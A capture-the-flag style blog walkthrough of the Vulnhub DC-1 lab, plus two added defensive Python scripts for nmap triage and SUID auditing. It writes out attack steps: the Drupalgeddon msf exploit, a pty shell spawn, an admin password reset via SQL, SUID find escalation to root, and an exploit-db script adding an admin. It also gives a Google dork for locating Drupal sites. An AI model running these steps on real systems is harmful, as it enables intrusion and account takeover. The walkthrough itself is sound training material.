
[Vulnhub target machine] DC-1

Host discovery

We use netdiscover to find hosts on the local network.


Use Nmap to probe the ports of 192.168.234.176:

nmap -Pn -A 192.168.234.176 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.176
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.176
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.176:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.234.176:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.234.176:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.234.176:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|     
|     Path: http://192.168.234.176:80/user/
|     Form id: user-login
|     Form action: /user/
|     
|     Path: http://192.168.234.176:80/user
|     Form id: user-login
|_    Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       https://www.drupal.org/SA-CORE-2014-005
|       http://www.securityfocus.com/bid/70595
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2013-2249	7.5	https://vulners.com/cve/CVE-2013-2249
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2013-1862	5.1	https://vulners.com/cve/CVE-2013-1862
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2013-5704	5.0	https://vulners.com/cve/CVE-2013-5704
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	CVE-2012-4558	4.3	https://vulners.com/cve/CVE-2012-4558
|     	CVE-2012-3499	4.3	https://vulners.com/cve/CVE-2012-3499
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|_    	CVE-2012-2687	2.6	https://vulners.com/cve/CVE-2012-2687
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36232/udp   status
|   100024  1          44155/tcp   status
|   100024  1          44611/udp6  status
|_  100024  1          53919/tcp6  status
MAC Address: 00:0C:29:BD:B2:2E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.40 ms 192.168.234.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds

During the scan we used nmap's vuln script category, which checks the target host for common, known vulnerabilities.

From the scan results, the machine has port 80 open and hosts a site built on the Drupal CMS, version 7, and a large number of vulnerabilities are reported against it.
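Raw nmap output like the above mixes two very different kinds of findings: the http-vuln-cve2014-3704 script actively tested the target and reported "State: VULNERABLE", while the vulners list is only inferred from the Apache version banner and may contain false positives. As an added example (not code from the original post), the following Python script parses nmap's normal output into a per-port inventory and ranks the CVE hits so that confirmed findings come first. SAMPLE_NMAP is a trimmed, constructed excerpt of the scan above; the 7.0 CVSS threshold used by triage() is an arbitrary assumption.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed excerpt of the "nmap -Pn -A --script=vuln" output shown above,
# trimmed to the lines the parser cares about.
SAMPLE_NMAP = """\
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|     \tCVE-2017-7679\t7.5\thttps://vulners.com/cve/CVE-2017-7679
|     \tCVE-2018-1312\t6.8\thttps://vulners.com/cve/CVE-2018-1312
|_    \tCVE-2012-2687\t2.6\thttps://vulners.com/cve/CVE-2012-2687
111/tcp open  rpcbind 2-4 (RPC #100000)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
VULNERS_RE = re.compile(r"(CVE-\d{4}-\d{4,})\s+(\d+(?:\.\d+)?)\s+https?://")
IDS_RE = re.compile(r"IDs:\s+CVE:(CVE-\d{4}-\d{4,})")


@dataclass
class PortFinding:
    port: int
    proto: str
    service: str
    version: str
    # CVE id -> (CVSS score if the script gave one, confirmed by an active check?)
    cves: Dict[str, Tuple[Optional[float], bool]] = field(default_factory=dict)


def parse_nmap_vuln(text: str) -> Dict[int, PortFinding]:
    """Build a per-port inventory from nmap's normal (-oN style) output."""
    findings: Dict[int, PortFinding] = {}
    current: Optional[PortFinding] = None
    confirmed = False  # inside a script block that reported "State: VULNERABLE"
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = None
            if state == "open":
                current = PortFinding(int(port), proto, service, version.strip())
                findings[current.port] = current
            confirmed = False
            continue
        if not line.startswith("|") or current is None:
            continue  # pre-scan scripts and host-level lines are ignored here
        body = line[2:] if line.startswith("|_") else line[1:]
        indent = len(body) - len(body.lstrip(" "))
        if indent <= 1 and body.strip():
            confirmed = False  # a new script header such as " vulners: " starts here
        if "State: VULNERABLE" in body:
            confirmed = True
        ids = IDS_RE.search(body)
        if ids:
            current.cves[ids.group(1)] = (None, confirmed)
        for cve, score in VULNERS_RE.findall(body):
            # version-inferred only; never let it overwrite a confirmed entry
            current.cves.setdefault(cve, (float(score), False))
    return findings


def triage(findings: Dict[int, PortFinding], min_score: float = 7.0) -> List[Tuple[int, str, str, Optional[float], bool]]:
    """Confirmed hits first, then version-inferred CVEs at or above min_score, highest CVSS first."""
    rows = []
    for f in findings.values():
        for cve, (score, confirmed) in f.cves.items():
            if confirmed or (score is not None and score >= min_score):
                rows.append((f.port, f.service, cve, score, confirmed))
    rows.sort(key=lambda r: (not r[4], -(r[3] or 0.0), r[2]))
    return rows


if __name__ == "__main__":
    for port, service, cve, score, confirmed in triage(parse_nmap_vuln(SAMPLE_NMAP)):
        tag = "CONFIRMED" if confirmed else f"CVSS {score}"
        print(f"{port}/{service:<8} {cve:<15} {tag}")
```

Run against the full scan above, the confirmed Drupalgeddon finding sorts to the top and the 7.x-rated Apache CVEs follow; the rpcbind port appears in the inventory with no CVEs attached, which is itself useful when deciding what to firewall.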

A few small side notes

Google hacking can be used to find large numbers of Drupal sites; the query is inurl:"q=user/password".

In real engagements, a quick way to learn the Drupal version is to look in robots.txt for the MAINTAINERS.txt file, which leaks the version number.

Vulnerability detection

In Kali we use searchsploit to look up exploitable vulnerabilities for Drupal.

SearchSploit is a command-line search tool for Exploit-DB that also lets you carry a copy of Exploit-DB with you.

SearchSploit gives you the ability to perform detailed offline searches through a locally checked-out copy of the repository. This is especially useful for security assessments of networks without Internet access. Many exploits contain links to binary files that are not included in the standard repository but can be found in the Exploit-DB Binaries repository.

searchsploit Drupal

Exploitation

Several of the vulnerabilities in the searchsploit results can be exploited through msf.

Open msf and search for the exploit:

use 4

info shows the exploit's details.

Our target site happens to fall within the exploitable version range.

set rhosts 192.168.234.176 sets the target machine's IP.

exploit runs the exploit.

The target machine checks in: exploitation succeeded.

A few things to note when setting the exploit options

Web services usually run on port 80, so the exploit fills in port 80 by default. If the web service runs on port 888 instead of 80, set the port to 888. Likewise for targeturi: if the CMS is installed under the /abc directory, set targeturi to /abc.

Finding the flags

Flag1

Running ls turns up flag1:

cat flag1.txt

Every good CMS needs a config file – and so do you.

So it is telling us to look for the web application's config file, which is fairly obvious.

Flag2

cat web.config showed nothing. Then I remembered that it means the CMS's config file.

After some searching, the config file to look for turned out to be settings.php under www/sites/default.

flag2

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

Below flag2 we found the MySQL database username and password, so we can try logging into MySQL to retrieve account credentials.

Flag3

Use python -c '__import__("pty").spawn("/bin/bash")' to get an interactive shell.

Log into MySQL:

mysql -u dbuser -p

Database queries

show databases; lists all databases

use drupaldb switches to the specified database

show tables; lists the tables

The table we care about most is the users table, so we go straight to it.

flag2 hinted that cracking is not the only way. Here we can use UPDATE directly to change admin's password, but since the stored password is hashed, we also need to find the corresponding hashing script.

Use quit to exit MySQL.

The hashing script was finally found in scripts under the web root:

www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh  drupal.sh	    generate-d6-content.sh  run-tests.sh
cron-curl.sh   dump-database-d6.sh  generate-d7-content.sh  test.script
cron-lynx.sh   dump-database-d7.sh  password-hash.sh
www-data@DC-1:/var/www/scripts$ ./password-hash.sh
./password-hash.sh

Generate Drupal password hashes from the shell.

Usage:        password-hash.sh [OPTIONS] "<plan-text password>"
Example:      password-hash.sh "mynewpassword"

All arguments are long options.

  --help      Print this page.

  --root <path>

              Set the working directory for the script to the specified path.
              To execute this script this has to be the root directory of your
              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
              running on Unix). Use surrounding quotation marks on Windows.

  "<password1>" ["<password2>" ["<password3>" ...]]

              One or more plan-text passwords enclosed by double quotes. The
              output hash may be manually entered into the {users}.pass field to
              change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

  ./scripts/password-hash.sh

Ran into a small problem here: the hashing kept failing, until the usage text showed that without the --root argument the script has to be invoked from the site's root directory: ./scripts/password-hash.sh "admin"

This gives $S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2

Updating the administrator password

Back in MySQL:

update users set pass='$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2' where uid=1;

Log in as admin with the new password and find flag3.

Flag4

Found by accident while working out the hash script; normally it would also turn up via /etc/passwd.

It is located under the /home directory.

It hints that we need to escalate privileges to get flag5.

Flag5

Following the hint from flag3, use find -exec.

Search for programs with the SUID bit set:

find / -user root -perm -4000 -print 2>/dev/null

find / -type f -perm -u=s 2>/dev/null

This shows that find is SUID root.

find ./ -exec "whoami" \; runs whoami as root

find ./ -exec "/bin/sh" \;

We now have root.
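From the defender's side, the SUID listing above is only meaningful against a baseline: a setuid find is not part of any stock Debian install, and the two find commands above would have surfaced it long before an attacker did. The Python below is an added example (not from the post) that parses the output of find / -perm -4000 -type f -printf '%m %u %p\n' and reports every setuid file that is outside the expected list, world-writable, not owned by root, or sitting in a user-writable directory. BASELINE_SUID and SAMPLE_FIND are constructed for illustration and are not a complete Debian inventory.

```python
import stat
from typing import Dict, List, Tuple

# Constructed output of:
#   find / -perm -4000 -type f -printf '%m %u %p\n' 2>/dev/null
# on a DC-1-like Debian host; /usr/bin/find is the anomaly the walkthrough abused,
# the last two lines are additional constructed anomalies.
SAMPLE_FIND = """\
4755 root /bin/su
4755 root /bin/mount
4755 root /bin/umount
4755 root /usr/bin/passwd
4755 root /usr/bin/sudo
4755 root /usr/bin/find
4755 root /usr/lib/openssh/ssh-keysign
4777 root /usr/local/bin/helper
4755 www-data /tmp/.cache/sh
"""

# Constructed, abbreviated baseline of binaries expected to carry setuid on this host.
# A real baseline comes from a known-good image of the same release, not from the
# compromised box itself.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
}
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_find_output(text: str) -> List[Tuple[int, str, str]]:
    """Each line is '<octal mode> <owner> <path>'; the path may itself contain spaces."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        mode, owner, path = line.split(maxsplit=2)
        rows.append((int(mode, 8), owner, path))
    return rows


def audit_suid(rows: List[Tuple[int, str, str]], baseline=BASELINE_SUID) -> Dict[str, List[str]]:
    """Group setuid files by the reason they deserve a look."""
    report: Dict[str, List[str]] = {
        "not_in_baseline": [], "world_writable": [], "non_root_owner": [], "user_writable_dir": [],
    }
    for mode, owner, path in rows:
        if not mode & stat.S_ISUID:
            continue  # -perm -4000 already guarantees this; kept for inputs from other tools
        if path not in baseline:
            report["not_in_baseline"].append(path)
        if mode & stat.S_IWOTH:
            report["world_writable"].append(path)  # anyone can replace the root-run code
        if owner != "root":
            report["non_root_owner"].append(path)
        if path.startswith(USER_WRITABLE_PREFIXES):
            report["user_writable_dir"].append(path)  # classic dropped-backdoor location
    return report


def reasons_by_path(report: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Invert the report so each suspicious path lists every reason it was flagged."""
    by_path: Dict[str, List[str]] = {}
    for reason, paths in report.items():
        for path in paths:
            by_path.setdefault(path, []).append(reason)
    return by_path


if __name__ == "__main__":
    flagged = reasons_by_path(audit_suid(parse_find_output(SAMPLE_FIND)))
    # most reasons first: the /tmp binary outranks the merely unexpected find
    for path, reasons in sorted(flagged.items(), key=lambda kv: -len(kv[1])):
        print(f"{path}: {', '.join(reasons)}")
```

On the sample data /usr/bin/find is flagged only as "not_in_baseline", which is exactly the finding that would have prevented the escalation shown above; the constructed /tmp binary collects three reasons and sorts to the top.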

Target machine completed.

Another way to get Flag3

Among the searchsploit results we also noticed the following script.

We can use this script to add another administrator account and then view flag3.

python 34992.py -t http://192.168.234.176/ -u admin123 -p admin123


Reproduction without permission is prohibited: HackerGu's Blog » [Vulnhub target machine] DC-1